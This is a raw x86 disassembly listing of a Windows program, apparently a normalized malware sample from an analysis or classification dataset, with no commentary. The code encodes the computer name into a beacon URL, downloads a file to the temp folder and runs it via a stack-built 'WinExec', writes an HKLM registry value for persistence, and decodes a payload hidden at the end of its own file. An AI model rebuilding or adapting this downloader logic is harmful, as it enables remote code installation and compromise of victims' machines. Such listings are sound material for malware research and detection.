sub_401000
push ecx
push ebx
push esi
mov esi [ esp + 0x14 ]
mov ecx 0x3
mov eax esi
xor ebx ebx
cdq
idiv ecx
cmp edx ebx
jne r-xdata
cmp edx 0x1
jne r-xdata
mov eax esi
jmp r-xdata
cmp edx 0x2
lea eax [ esi + 0x1 ]
je r-xdata
lea eax [ esi + 0x2 ]
jmp r-xdata
lea ecx [ eax * 4 ]
mov eax 0x55555556
imul ecx
mov ecx [ esp + 0x1c ]
mov eax edx
shr eax 0x1f
add edx eax
dec ecx
cmp ecx edx
jge r-xdata
mov eax [ esp + 0x8 ]
push ebp
lea edx [ esi + 0x1 ]
push edi
push edx
mov [ esp + 0x14 ] esi
mov [ esp + 0x28 ] ebx
call ??2@YAPAXI@Z
mov ecx esi
mov esi [ esp + 0x1c ]
mov ebp eax
mov eax ecx
mov edi ebp
add esp 0x4
shr ecx 0x2
[ edi ] [ esi ]
mov ecx eax
and ecx 0x3
[ edi ] [ esi ]
mov ecx [ esp + 0x1c ]
mov esi [ esp + 0x20 ]
cmp ecx 0x3
mov [ ecx + ebp ] 0x0
jl r-xdata
pop esi
xor eax eax
pop ebx
pop ecx
retn
mov eax [ esp + 0x10 ]
cmp eax 0x2
jne r-xdata
mov eax 0xaaaaaaab
mul ecx
shr edx 0x1
lea eax [ edx + edx * 2 ]
sub ecx eax
mov [ esp + 0x10 ] ecx
cmp eax 0x1
jne r-xdata
mov eax [ esp + 0x24 ]
mov cl [ eax + ebp ]
lea edi [ eax + ebp + 0x1 ]
sar ecx 0x2
and ecx 0x3f
mov dl [ ecx + rw-data ]
mov [ ebx + esi ] dl
mov al [ eax + ebp ]
mov cl [ edi ]
and eax 0x3
sar ecx 0x4
shl eax 0x4
and ecx 0xf
or eax ecx
mov dl [ eax + rw-data ]
mov [ ebx + esi + 0x1 ] dl
mov al [ edi ]
and eax 0xf
mov cl [ eax * 4 + rw-data ]
mov [ ebx + esi + 0x2 ] cl
mov [ ebx + esi + 0x3 ] 0x3d
jmp r-xdata
mov edi [ esp + 0x24 ]
add ebx 0x4
mov cl [ edi + ebp ]
add edi 0x3
sar ecx 0x2
and ecx 0x3f
mov [ esp + 0x24 ] edi
mov al [ ecx + rw-data ]
mov [ esi + ebx - 0x4 ] al
mov cl [ edi + ebp - 0x3 ]
mov al [ edi + ebp - 0x2 ]
and ecx 0x3
sar eax 0x4
shl ecx 0x4
and eax 0xf
or ecx eax
mov cl [ ecx + rw-data ]
mov [ esi + ebx - 0x3 ] cl
mov al [ edi + ebp - 0x1 ]
mov cl [ edi + ebp - 0x2 ]
sar eax 0x6
and ecx 0xf
and eax 0x3
shl ecx 0x2
or eax ecx
mov al [ eax + rw-data ]
mov [ esi + ebx - 0x2 ] al
mov cl [ edi + ebp - 0x1 ]
and ecx 0x3f
dec edx
mov al [ ecx + rw-data ]
mov [ esi + ebx - 0x1 ] al
jne r-xdata
push ebp
mov [ ebx + esi ] 0x0
call ??3@YAXPAX@Z
add esp 0x4
mov eax ebx
pop edi
pop ebp
pop esi
pop ebx
pop ecx
retn
mov eax [ esp + 0x24 ]
mov dl [ eax + ebp ]
sar edx 0x2
and edx 0x3f
mov cl [ edx + rw-data ]
mov [ ebx + esi ] cl
mov dl [ eax + ebp ]
and edx 0x3
shl edx 0x4
mov al [ edx + rw-data ]
mov [ ebx + esi + 0x1 ] al
mov al 0x3d
mov [ ebx + esi + 0x2 ] al
mov [ ebx + esi + 0x3 ] al
add ebx 0x4
sub_4011d0
push ebx
push esi
mov esi [ esp + 0xc ]
push edi
mov edi esi
or ecx 0xffffffff
xor eax eax
[ edi ]
not ecx
dec ecx
mov edi ecx
mov eax edi
and eax 0x80000003
jns r-xdata
je r-xdata
dec eax
or eax 0xfffffffc
inc eax
push rw-data
push esi
xor ebx ebx
call [ strstr@IAT ]
add esp 0x8
test eax eax
je r-xdata
pop edi
pop esi
xor eax eax
pop ebx
retn
push 0x3d
push esi
call [ strchr@IAT ]
add esp 0x8
test eax eax
je r-xdata
mov ebx 0x2
jmp r-xdata
lea eax [ edi + edi * 2 ]
cdq
and edx 0x3
add eax edx
mov ecx eax
mov eax [ esp + 0x18 ]
sar ecx 0x2
sub ecx ebx
cmp eax ecx
jge r-xdata
mov ebx 0x1
sub edi ebx
push ebp
mov [ esp + 0x14 ] edi
push eax
xor edi edi
xor ebx ebx
call ??2@YAPAXI@Z
mov ebp eax
mov eax [ esp + 0x18 ]
add esp 0x4
cmp eax 0x4
jl r-xdata
pop edi
pop esi
xor eax eax
pop ebx
retn
cmp eax 0x3
jne r-xdata
mov ecx eax
shr ecx 0x2
mov [ esp + 0x1c ] ecx
neg ecx
lea edx [ eax + ecx * 4 ]
mov [ esp + 0x14 ] edx
cmp eax 0x2
jne r-xdata
movsx eax [ edi + esi ]
push eax
push rw-data
call [ strchr@IAT ]
mov ecx rw-data
sub al cl
shl al 0x2
mov [ ebx + ebp ] al
movsx edx [ edi + esi + 0x1 ]
push edx
push ecx
call [ strchr@IAT ]
mov dl [ ebx + ebp ]
sub eax rw-data
mov ecx eax
sar ecx 0x4
or dl cl
shl al 0x4
mov [ ebx + ebp ] dl
mov [ ebx + ebp + 0x1 ] al
movsx edx [ edi + esi + 0x2 ]
push edx
push rw-data
call [ strchr@IAT ]
mov cl [ ebx + ebp + 0x1 ]
sub eax rw-data
sar eax 0x2
or cl al
add esp 0x18
mov [ ebx + ebp + 0x1 ] cl
add ebx 0x2
jmp r-xdata
movsx eax [ esi + edi ]
push eax
push rw-data
call [ strchr@IAT ]
mov ecx rw-data
sub al cl
shl al 0x2
mov [ ebx + ebp ] al
movsx edx [ esi + edi + 0x1 ]
push edx
push ecx
call [ strchr@IAT ]
mov dl [ ebx + ebp ]
sub eax rw-data
mov ecx eax
sar ecx 0x4
or dl cl
shl al 0x4
mov [ ebx + ebp ] dl
mov [ ebx + ebp + 0x1 ] al
movsx edx [ esi + edi + 0x2 ]
push edx
push rw-data
call [ strchr@IAT ]
mov dl [ ebx + ebp + 0x1 ]
sub eax rw-data
mov ecx eax
sar ecx 0x2
or dl cl
shl al 0x6
mov [ ebx + ebp + 0x1 ] dl
mov [ ebx + ebp + 0x2 ] al
movsx edx [ esi + edi + 0x3 ]
push edx
push rw-data
call [ strchr@IAT ]
mov cl [ ebx + ebp + 0x2 ]
sub eax rw-data
or cl al
mov eax [ esp + 0x3c ]
mov [ ebx + ebp + 0x2 ] cl
add esp 0x20
add edi 0x4
add ebx 0x3
dec eax
mov [ esp + 0x1c ] eax
jne r-xdata
mov eax [ esp + 0x14 ]
mov edi [ esp + 0x18 ]
mov ecx ebx
mov eax ecx
mov esi ebp
shr ecx 0x2
[ edi ] [ esi ]
mov ecx eax
push ebp
and ecx 0x3
[ edi ] [ esi ]
call ??3@YAXPAX@Z
add esp 0x4
mov eax ebx
pop ebp
pop edi
pop esi
pop ebx
retn
movsx eax [ edi + esi ]
push eax
push rw-data
call [ strchr@IAT ]
mov ecx rw-data
sub al cl
shl al 0x2
mov [ ebx + ebp ] al
movsx edx [ edi + esi + 0x1 ]
push edx
push ecx
call [ strchr@IAT ]
mov cl [ ebx + ebp ]
sub eax rw-data
sar eax 0x4
or cl al
add esp 0x10
mov [ ebx + ebp ] cl
inc ebx
sub_401410
sub esp 0x10c
mov al [ rw-data ]
push ebp
push edi
mov [ esp + 0x10 ] al
mov ecx 0x40
xor eax eax
lea edi [ esp + 0x11 ]
push 0x2f
[ edi ]
mov ecx [ esp + 0x11c ]
mov [ esp + 0xc ] 0x57
stosw [ edi ]
stosb [ edi ]
mov edi [ strrchr@IAT ]
push ecx
mov [ esp + 0x11 ] 0x69
mov [ esp + 0x12 ] 0x6e
mov [ esp + 0x13 ] 0x45
mov [ esp + 0x14 ] 0x78
mov [ esp + 0x15 ] 0x65
mov [ esp + 0x16 ] 0x63
mov [ esp + 0x17 ] 0x0
call edi
add esp 0x8
test eax eax
jne r-xdata
mov ebp [ esp + 0x120 ]
push esi
test ebp ebp
je r-xdata
pop edi
pop ebp
add esp 0x10c
retn
mov edi [ esp + 0x120 ]
or ecx 0xffffffff
xor eax eax
lea edx [ esp + 0x14 ]
[ edi ]
not ecx
sub edi ecx
mov eax ecx
mov esi edi
mov edi edx
shr ecx 0x2
[ edi ] [ esi ]
mov ecx eax
mov esi [ esp + 0x120 ]
push 0x2e
push esi
call [ strchr@IAT ]
add esp 0x8
test eax eax
je r-xdata
test ebp ebp
je r-xdata
pop edi
pop ebp
add esp 0x10c
retn
mov edi esi
or ecx 0xffffffff
xor eax eax
[ edi ]
not ecx
dec ecx
mov eax ecx
push 0x2e
push esi
call edi
add esp 0x8
sub eax esi
jmp r-xdata
pop edi
mov eax 0x1
pop ebp
add esp 0x10c
retn
push rw-data
call [ LoadLibraryA@IAT ]
lea ecx [ esp + 0x8 ]
push ecx
push eax
call [ GetProcAddress@IAT ]
lea edx [ esp + 0x10 ]
push 0x0
push edx
call eax
cmp eax 0x1f
ja r-xdata
mov [ esp + ecx + 0x14 ] 0x0
mov edi rw-data
or ecx 0xffffffff
xor eax eax
[ edi ]
not ecx
sub edi ecx
lea edx [ esp + 0x14 ]
mov esi edi
mov edi edx
mov edx ecx
or ecx 0xffffffff
[ edi ]
mov ecx edx
dec edi
shr ecx 0x2
[ edi ] [ esi ]
mov ecx edx
jmp r-xdata
mov ecx eax
lea edi [ esp + 0x14 ]
mov edx ecx
shr ecx 0x2
[ edi ] [ esi ]
mov ecx edx
and ecx 0x3
[ edi ] [ esi ]
mov ecx eax
xor ecx ecx
test eax eax
jle r-xdata
pop edi
xor eax eax
pop ebp
add esp 0x10c
retn
mov edx [ esp + 0x11c ]
and ecx 0x3
[ edi ] [ esi ]
lea ecx [ esp + 0x14 ]
push ecx
push edx
call sub_4015a0
add esp 0x8
test eax eax
pop esi
jne r-xdata
sub_4015a0
sub esp 0x614
push ebx
push ebp
push esi
push edi
mov edi rw-data
or ecx 0xffffffff
xor eax eax
lea edx [ esp + 0x120 ]
[ edi ]
not ecx
sub edi ecx
push 0x0
mov eax ecx
mov esi edi
mov edi edx
push 0x0
shr ecx 0x2
[ edi ] [ esi ]
mov ecx eax
push 0x0
and ecx 0x3
push 0x0
[ edi ] [ esi ]
lea ecx [ esp + 0x130 ]
push ecx
call [ InternetOpenA@IAT ]
mov ebp eax
test ebp ebp
mov [ esp + 0x18 ] ebp
jne r-xdata
mov edx [ esp + 0x628 ]
push 0x0
push 0x80000000
push 0x0
push 0x0
push edx
push ebp
call [ InternetOpenUrlA@IAT ]
mov ebx eax
test ebx ebx
jne r-xdata
pop edi
pop esi
pop ebp
pop ebx
add esp 0x614
retn
push 0x0
mov [ esp + 0x14 ] 0x0
call [ time@IAT ]
push eax
call [ srand@IAT ]
push 0x9
call [ malloc@IAT ]
xor ecx ecx
mov [ esp + 0x1c ] eax
mov [ eax ] ecx
lea edx [ esp + 0x1c ]
mov [ eax + 0x4 ] ecx
push ecx
push 0x9
push 0x8
push edx
mov [ eax + 0x8 ] cl
call sub_4021f0
add esp 0x1c
lea eax [ esp + 0x1c ]
push eax
push 0x104
call [ GetTempPathA@IAT ]
mov edi [ esp + 0x10 ]
or ecx 0xffffffff
xor eax eax
lea edx [ esp + 0x1c ]
[ edi ]
not ecx
sub edi ecx
push rw-data
mov esi edi
mov edi edx
mov edx ecx
or ecx 0xffffffff
[ edi ]
mov ecx edx
dec edi
shr ecx 0x2
[ edi ] [ esi ]
mov ecx edx
lea edx [ esp + 0x20 ]
and ecx 0x3
[ edi ] [ esi ]
mov edi rw-data
or ecx 0xffffffff
[ edi ]
not ecx
sub edi ecx
mov esi edi
mov edi edx
mov edx ecx
or ecx 0xffffffff
[ edi ]
mov ecx edx
dec edi
shr ecx 0x2
[ edi ] [ esi ]
mov ecx edx
lea eax [ esp + 0x20 ]
and ecx 0x3
push eax
[ edi ] [ esi ]
call [ fopen@IAT ]
mov esi eax
add esp 0x8
test esi esi
jne r-xdata
push ebp
call [ InternetCloseHandle@IAT ]
pop edi
pop esi
pop ebp
xor eax eax
pop ebx
add esp 0x614
retn
push rw-data
call [ LoadLibraryA@IAT ]
push rw-data
push eax
call [ GetProcAddress@IAT ]
lea ecx [ esp + 0x14 ]
lea edx [ esp + 0x224 ]
push ecx
push 0x400
push edx
mov edi eax
push ebx
call edi
test eax eax
je r-xdata
mov esi [ InternetCloseHandle@IAT ]
push ebx
call esi
push ebp
call esi
pop edi
pop esi
pop ebp
xor eax eax
pop ebx
add esp 0x614
retn
push esi
call [ fclose@IAT ]
mov esi [ InternetCloseHandle@IAT ]
add esp 0x4
push ebx
call esi
push ebp
call esi
mov eax [ esp + 0x62c ]
lea ecx [ esp + 0x1c ]
push eax
push ecx
call sub_4017e0
add esp 0x8
lea edx [ esp + 0x1c ]
mov esi eax
push edx
call [ DeleteFileA@IAT ]
mov eax [ esp + 0x10 ]
test eax eax
je r-xdata
mov ebp [ fwrite@IAT ]
mov eax esi
pop edi
pop esi
pop ebp
pop ebx
add esp 0x614
retn
push eax
call [ free@IAT ]
add esp 0x4
mov ebp [ esp + 0x18 ]
push esi
push eax
lea eax [ esp + 0x22c ]
push 0x1
push eax
call ebp
push esi
call [ fflush@IAT ]
add esp 0x14
lea ecx [ esp + 0x14 ]
lea edx [ esp + 0x224 ]
push ecx
push 0x400
push edx
push ebx
call edi
test eax eax
jne r-xdata
mov eax [ esp + 0x14 ]
test eax eax
je r-xdata
sub_4017e0
sub esp 0x40c
mov eax [ esp + 0x410 ]
push ebx
push ebp
push esi
push edi
push rw-data
push eax
mov [ esp + 0x18 ] 0xff
mov [ esp + 0x19 ] 0x3
mov [ esp + 0x1a ] 0xb7
mov [ esp + 0x1b ] 0xb9
call [ fopen@IAT ]
mov edi eax
add esp 0x8
test edi edi
jne r-xdata
mov ebx [ fseek@IAT ]
push 0x2
push 0xfffffffa
push edi
call ebx
push edi
push 0x4
lea ecx [ esp + 0x28 ]
push 0x1
push ecx
call [ fread@IAT ]
mov esi [ esp + 0x30 ]
mov edx [ esp + 0x31 ]
mov eax [ esp + 0x32 ]
and esi 0xff
mov ecx [ esp + 0x33 ]
and edx 0xff
shl esi 0x8
add esi edx
and eax 0xff
shl esi 0x8
add esi eax
push 0x2
shl esi 0x8
and ecx 0xff
push 0x0
push edi
add esi ecx
call ebx
push edi
call [ ftell@IAT ]
mov edx 0xfffffff6
push 0x0
mov ebp eax
sub edx esi
push esi
push edi
add ebp edx
call ebx
push edi
push 0x4
lea eax [ esp + 0x5c ]
push 0x1
push eax
call [ fread@IAT ]
lea edx [ esp + 0x64 ]
lea ecx [ esp + 0x58 ]
add esp 0x48
mov eax [ edx ]
mov edx [ ecx ]
cmp eax edx
je r-xdata
pop edi
pop esi
pop ebp
pop ebx
add esp 0x40c
retn
mov ecx [ esp + 0x424 ]
push rw-data
push ecx
xor ebx ebx
call [ fopen@IAT ]
mov esi eax
add esp 0x8
test esi esi
jne r-xdata
push edi
call [ fclose@IAT ]
add esp 0x4
xor eax eax
pop edi
pop esi
pop ebp
pop ebx
add esp 0x40c
retn
push edi
push 0x400
lea edx [ esp + 0x24 ]
push 0x1
push edx
call [ fread@IAT ]
add ebx eax
add esp 0x10
cmp ebx ebp
jg r-xdata
push edi
call [ fclose@IAT ]
add esp 0x4
xor eax eax
pop edi
pop esi
pop ebp
pop ebx
add esp 0x40c
retn
sub eax ebx
xor ecx ecx
add eax ebp
test eax eax
jle r-xdata
xor ecx ecx
test eax eax
jle r-xdata
push esi
push eax
lea eax [ esp + 0x24 ]
push 0x1
push eax
call [ fwrite@IAT ]
push esi
call [ fflush@IAT ]
push esi
mov esi [ fclose@IAT ]
call esi
push edi
call esi
add esp 0x1c
mov eax ebp
pop edi
pop esi
pop ebp
pop ebx
add esp 0x40c
retn
mov dl [ esp + ecx + 0x1c ]
inc ecx
not dl
mov [ esp + ecx + 0x1b ] dl
cmp ecx eax
jl r-xdata
push esi
push eax
lea eax [ esp + 0x24 ]
push 0x1
push eax
call [ fwrite@IAT ]
push esi
call [ fflush@IAT ]
add esp 0x14
jmp r-xdata
mov dl [ esp + ecx + 0x1c ]
inc ecx
not dl
mov [ esp + ecx + 0x1b ] dl
cmp ecx eax
jl r-xdata
sub_4019a0
sub esp 0x9a4
push ebx
push ebp
push esi
push edi
mov edi rw-data
or ecx 0xffffffff
xor eax eax
lea edx [ esp + 0x71c ]
[ edi ]
not ecx
sub edi ecx
push 0x104
mov eax ecx
mov esi edi
mov edi edx
shr ecx 0x2
[ edi ] [ esi ]
mov ecx eax
and ecx 0x3
[ edi ] [ esi ]
lea ecx [ esp + 0x20 ]
push ecx
push 0x0
call [ GetModuleFileNameA@IAT ]
lea edx [ esp + 0x1c ]
push 0x5c
push edx
call [ strrchr@IAT ]
inc eax
or ecx 0xffffffff
mov edi eax
xor eax eax
[ edi ]
not ecx
sub edi ecx
lea edx [ esp + 0x22c ]
mov eax ecx
mov esi edi
mov edi edx
push 0x2e
shr ecx 0x2
[ edi ] [ esi ]
mov ecx eax
and ecx 0x3
[ edi ] [ esi ]
lea ecx [ esp + 0x230 ]
push ecx
call [ strchr@IAT ]
add esp 0x10
lea edx [ esp + 0x18 ]
mov [ eax ] 0x0
lea eax [ esp + 0x71c ]
push edx
push 0xf003f
push 0x0
push eax
push 0x80000002
call [ RegOpenKeyExA@IAT ]
lea edi [ esp + 0x1c ]
or ecx 0xffffffff
xor eax eax
lea edx [ esp + 0x224 ]
[ edi ]
not ecx
push ecx
lea ecx [ esp + 0x20 ]
push ecx
push 0x1
push eax
mov eax [ esp + 0x28 ]
push edx
push eax
call [ RegSetValueExA@IAT ]
mov esi [ RegCloseKey@IAT ]
mov ecx [ esp + 0x18 ]
push ecx
call esi
push 0x80000002
call esi
lea edx [ esp + 0x1c ]
push edx
call [ LoadLibraryA@IAT ]
mov ebx [ LoadStringA@IAT ]
mov esi eax
lea eax [ esp + 0x588 ]
push 0x191
push eax
push 0x1
push esi
call ebx
lea ecx [ esp + 0x458 ]
push 0x12d
push ecx
lea edi [ esp + 0x590 ]
or ecx 0xffffffff
xor eax eax
[ edi ]
not ecx
dec ecx
lea edx [ esp + 0x590 ]
push ecx
push edx
call sub_401cb0
add esp 0x10
mov [ esp + eax + 0x458 ] 0x0
lea eax [ esp + 0x820 ]
push 0x12d
push eax
push 0x2
push esi
call ebx
lea ecx [ esp + 0x328 ]
push 0x12d
push ecx
lea edi [ esp + 0x828 ]
or ecx 0xffffffff
xor eax eax
[ edi ]
not ecx
dec ecx
lea edx [ esp + 0x828 ]
push ecx
push edx
call sub_401cb0
add esp 0x10
mov [ esp + eax + 0x328 ] 0x0
push esi
call [ FreeLibrary@IAT ]
xor ebx ebx
push 0x208
mov [ esp + 0x14 ] ebx
call [ malloc@IAT ]
mov ebp eax
add esp 0x4
mov [ esp + 0x14 ] ebp
inc ebx
mov [ esp + 0x10 ] ecx
cmp ebx 0x3
jl r-xdata
dec eax
je r-xdata
push 0x927c0
call [ Sleep@IAT ]
jmp r-xdata
push 0x5b8d80
call [ Sleep@IAT ]
jmp r-xdata
mov [ esp + 0x10 ] ecx
lea ecx [ ebp + 0x104 ]
push ecx
xor ebx ebx
call [ atoi@IAT ]
lea eax [ eax + eax * 2 ]
add esp 0x4
lea eax [ eax + eax * 4 ]
lea eax [ eax + eax * 4 ]
lea eax [ eax + eax * 4 ]
lea edx [ eax + eax * 4 ]
shl edx 0x5
push edx
call [ Sleep@IAT ]
jmp r-xdata
dec eax
jne r-xdata
mov ecx 0x82
xor eax eax
mov edi ebp
[ edi ]
lea eax [ esp + 0x328 ]
lea ecx [ esp + 0x458 ]
push eax
push ebp
push ecx
call sub_401d90
xor ecx ecx
add esp 0xc
sub eax ecx
je r-xdata
lea edx [ esp + 0x120 ]
xor ebx ebx
push edx
push 0x104
call [ GetTempPathA@IAT ]
add ebp 0x104
push 0x2f
push ebp
call [ strrchr@IAT ]
mov edi eax
or ecx 0xffffffff
inc edi
xor eax eax
[ edi ]
not ecx
sub edi ecx
lea edx [ esp + 0x128 ]
mov esi edi
mov edi edx
mov edx ecx
or ecx 0xffffffff
[ edi ]
mov ecx edx
dec edi
shr ecx 0x2
[ edi ] [ esi ]
mov ecx edx
lea eax [ esp + 0x128 ]
and ecx 0x3
push 0x1
push eax
push ebp
[ edi ] [ esi ]
call sub_401410
add esp 0x14
test eax eax
jne r-xdata
push 0x57e40
mov [ esp + 0x14 ] 0x0
call [ Sleep@IAT ]
mov ebp [ esp + 0x14 ]
jmp r-xdata
mov eax [ esp + 0x10 ]
inc eax
cmp eax 0x3
mov [ esp + 0x10 ] eax
jl r-xdata
push 0x75300
call [ Sleep@IAT ]
mov ebp [ esp + 0x14 ]
jmp r-xdata
push 0x5265c0
call [ Sleep@IAT ]
mov ebp [ esp + 0x14 ]
jmp r-xdata
sub_401cb0
mov eax [ esp + 0x8 ]
push ebx
push esi
push edi
lea ebx [ eax + 0x1 ]
push ebx
call [ malloc@IAT ]
mov ecx ebx
mov esi eax
mov edx ecx
xor eax eax
mov edi esi
push ebx
shr ecx 0x2
[ edi ]
mov ecx edx
push esi
and ecx 0x3
[ edi ]
mov eax [ esp + 0x1c ]
push eax
call sub_402380
add esp 0x10
test eax eax
jne r-xdata
mov ecx [ esp + 0x1c ]
mov ebx [ esp + 0x18 ]
push ecx
push ebx
push esi
call sub_4011d0
mov edi eax
push esi
mov [ edi + ebx ] 0x0
call [ free@IAT ]
add esp 0x10
mov eax edi
pop edi
pop esi
pop ebx
retn
pop edi
pop esi
pop ebx
retn
sub_401d20
push ebx
push ebp
mov ebp [ esp + 0x18 ]
push esi
push edi
lea ebx [ ebp + 0x1 ]
push ebx
call [ malloc@IAT ]
mov ecx ebx
mov esi eax
mov edx ecx
xor eax eax
mov edi esi
push ebx
shr ecx 0x2
[ edi ]
mov ecx edx
push esi
and ecx 0x3
[ edi ]
mov eax [ esp + 0x24 ]
mov ecx [ esp + 0x20 ]
push eax
push ecx
call sub_401000
add esp 0x14
test eax eax
jne r-xdata
mov ebx [ esp + 0x1c ]
push ebp
push ebx
push esi
call sub_4022a0
mov edi eax
push esi
mov [ edi + ebx ] 0x0
call [ free@IAT ]
add esp 0x10
mov eax edi
pop edi
pop esi
pop ebp
pop ebx
retn
pop edi
pop esi
pop ebp
pop ebx
retn
sub_401d90
sub esp 0x794
push ebx
push ebp
push esi
lea eax [ esp + 0x18 ]
push edi
lea ecx [ esp + 0x20 ]
xor ebx ebx
push eax
push ecx
mov [ esp + 0x18 ] ebx
mov [ esp + 0x24 ] 0x1f
call [ GetComputerNameA@IAT ]
lea edi [ esp + 0x20 ]
or ecx 0xffffffff
xor eax eax
lea edx [ esp + 0x40 ]
[ edi ]
not ecx
push 0x29
dec ecx
push edx
lea eax [ esp + 0x28 ]
push ecx
push eax
call sub_401d20
mov ecx [ esp + 0x7c0 ]
add esp 0x10
lea edx [ esp + 0x40 ]
lea eax [ esp + 0x2a0 ]
push ecx
push edx
push rw-data
push eax
call [ sprintf@IAT ]
add esp 0x10
lea ecx [ esp + 0x2a0 ]
push ebx
push ebx
push ebx
push ebx
push ecx
call [ InternetOpenA@IAT ]
mov esi eax
cmp esi ebx
mov [ esp + 0x18 ] esi
jne r-xdata
mov edi [ esp + 0x7a8 ]
push ebx
push 0x80000000
push ebx
push ebx
push edi
push esi
call [ InternetOpenUrlA@IAT ]
mov ebp eax
cmp ebp ebx
jne r-xdata
pop edi
pop esi
pop ebp
xor eax eax
pop ebx
add esp 0x794
retn
push rw-data
call [ LoadLibraryA@IAT ]
mov esi eax
push rw-data
push esi
call [ GetProcAddress@IAT ]
push esi
mov [ rw-data ] eax
call [ FreeLibrary@IAT ]
lea edx [ esp + 0x6c ]
push edx
push 0x104
call [ GetTempPathA@IAT ]
push 0x2f
push edi
call [ strrchr@IAT ]
mov edi eax
or ecx 0xffffffff
inc edi
xor eax eax
[ edi ]
not ecx
sub edi ecx
lea edx [ esp + 0x74 ]
mov esi edi
mov edi edx
mov edx ecx
or ecx 0xffffffff
[ edi ]
mov ecx edx
dec edi
shr ecx 0x2
[ edi ] [ esi ]
mov ecx edx
lea eax [ esp + 0x74 ]
and ecx 0x3
push rw-data
[ edi ] [ esi ]
push eax
call [ fopen@IAT ]
mov esi eax
add esp 0x10
cmp esi ebx
jne r-xdata
push esi
call [ InternetCloseHandle@IAT ]
pop edi
pop esi
pop ebp
xor eax eax
pop ebx
add esp 0x794
retn
mov edi [ fwrite@IAT ]
mov [ esp + 0x14 ] ebx
mov ebx [ fflush@IAT ]
pop edi
pop esi
pop ebp
xor eax eax
pop ebx
add esp 0x794
retn
mov edi [ InternetCloseHandle@IAT ]
push ebp
call edi
mov ecx [ esp + 0x18 ]
push ecx
call edi
mov ebx [ fclose@IAT ]
push esi
call ebx
push esi
call ebx
add esp 0x8
push ebp
call edi
mov edx [ esp + 0x18 ]
push edx
call edi
lea eax [ esp + 0x170 ]
push 0x12d
lea ecx [ esp + 0x70 ]
push eax
push ecx
call sub_402050
add esp 0xc
test eax eax
je r-xdata
mov eax [ esp + 0x14 ]
test eax eax
je r-xdata
lea ecx [ esp + 0x6c ]
push ecx
call [ DeleteFileA@IAT ]
mov eax [ esp + 0x10 ]
pop edi
pop esi
pop ebp
pop ebx
add esp 0x794
retn
mov esi [ strchr@IAT ]
lea edx [ esp + 0x170 ]
push 0x3a
push edx
call esi
add esp 0x8
test eax eax
je r-xdata
push esi
push eax
lea eax [ esp + 0x3ac ]
push 0x1
push eax
call edi
push esi
call ebx
add esp 0x14
jmp r-xdata
lea eax [ esp + 0x170 ]
push 0x3a
push eax
call esi
mov ebx [ esp + 0x7b4 ]
lea ecx [ esp + 0x178 ]
sub eax ecx
lea edx [ esp + 0x178 ]
push eax
push edx
push ebx
call [ strncpy@IAT ]
lea eax [ esp + 0x184 ]
push 0x3a
push eax
call esi
mov edi eax
or ecx 0xffffffff
inc edi
xor eax eax
[ edi ]
not ecx
sub edi ecx
lea edx [ ebx + 0x104 ]
mov eax ecx
mov esi edi
mov edi edx
push rw-data
shr ecx 0x2
[ edi ] [ esi ]
mov ecx eax
push ebx
and ecx 0x3
[ edi ] [ esi ]
mov esi [ _stricmp@IAT ]
call esi
add esp 0x24
test eax eax
jne r-xdata
lea ecx [ esp + 0x14 ]
lea edx [ esp + 0x3a4 ]
push ecx
push 0x400
push edx
push ebp
call [ rw-data ]
test eax eax
je r-xdata
push rw-data
push ebx
call esi
add esp 0x8
test eax eax
jne r-xdata
mov [ esp + 0x10 ] 0x1
jmp r-xdata
mov [ esp + 0x10 ] 0x2
sub_402050
sub esp 0x1a0
mov eax [ esp + 0x1a4 ]
push ebx
push ebp
push esi
push edi
push rw-data
push eax
mov [ esp + 0x18 ] 0xff
mov [ esp + 0x19 ] 0x2
mov [ esp + 0x1a ] 0xb7
mov [ esp + 0x1b ] 0xbc
call [ fopen@IAT ]
mov ebx eax
add esp 0x8
test ebx ebx
jne r-xdata
mov edi [ fseek@IAT ]
push 0x2
push 0xfffffffa
push ebx
call edi
push ebx
push 0x4
lea ecx [ esp + 0x28 ]
push 0x1
push ecx
call [ fread@IAT ]
mov esi [ esp + 0x30 ]
mov edx [ esp + 0x31 ]
mov eax [ esp + 0x32 ]
and esi 0xff
mov ecx [ esp + 0x33 ]
and edx 0xff
shl esi 0x8
add esi edx
and eax 0xff
shl esi 0x8
add esi eax
push 0x2
shl esi 0x8
and ecx 0xff
push 0x0
push ebx
add esi ecx
call edi
push ebx
call [ ftell@IAT ]
mov edx 0xfffffff6
push 0x0
mov ebp eax
sub edx esi
push esi
push ebx
add ebp edx
call edi
push ebx
push 0x4
lea eax [ esp + 0x5c ]
push 0x1
push eax
call [ fread@IAT ]
lea edx [ esp + 0x64 ]
lea ecx [ esp + 0x58 ]
add esp 0x48
mov eax [ edx ]
mov edx [ ecx ]
cmp eax edx
je r-xdata
pop edi
pop esi
pop ebp
pop ebx
add esp 0x1a0
retn
mov ecx 0x64
xor eax eax
lea edi [ esp + 0x1c ]
cmp ebp 0x190
[ edi ]
stosb [ edi ]
push ebx
jbe r-xdata
push ebx
call [ fclose@IAT ]
add esp 0x4
xor eax eax
pop edi
pop esi
pop ebp
pop ebx
add esp 0x1a0
retn
push ebp
lea ecx [ esp + 0x24 ]
push 0x1
push ecx
call [ fread@IAT ]
push ebx
call [ fclose@IAT ]
add esp 0x14
xor eax eax
test ebp ebp
jle r-xdata
call [ fclose@IAT ]
add esp 0x4
xor eax eax
pop edi
pop esi
pop ebp
pop ebx
add esp 0x1a0
retn
mov eax [ esp + 0x1bc ]
mov esi [ esp + 0x1b8 ]
push eax
push esi
lea ecx [ esp + 0x24 ]
push ebp
push ecx
call sub_401cb0
add esp 0x10
mov [ eax + esi ] 0x0
pop edi
pop esi
pop ebp
pop ebx
add esp 0x1a0
retn
mov dl [ esp + eax + 0x1c ]
inc eax
not dl
mov [ esp + eax + 0x1b ] dl
cmp eax ebp
jl r-xdata
sub_4021f0
mov edx [ esp + 0xc ]
cmp edx 0x104
mov ecx edx
jle r-xdata
push ebx
push ebp
mov ebp [ esp + 0x18 ]
push esi
test ebp ebp
push edi
je r-xdata
xor al al
retn
mov ebx [ esp + 0x14 ]
mov esi ecx
xor eax eax
push edx
mov edi [ ebx ]
shr ecx 0x2
[ edi ]
mov ecx esi
and ecx 0x3
[ edi ]
mov eax [ esp + 0x1c ]
push eax
call sub_4021d0
mov edi eax
add esp 0x8
xor esi esi
test edi edi
jle r-xdata
mov edi ebp
or ecx 0xffffffff
xor eax eax
[ edi ]
not ecx
dec ecx
lea ecx [ ecx + edx + 0x1 ]
test ebp ebp
je r-xdata
push 0x7a
push 0x61
call sub_4021d0
mov ecx [ ebx ]
add esp 0x8
mov [ ecx + esi ] al
inc esi
cmp esi edi
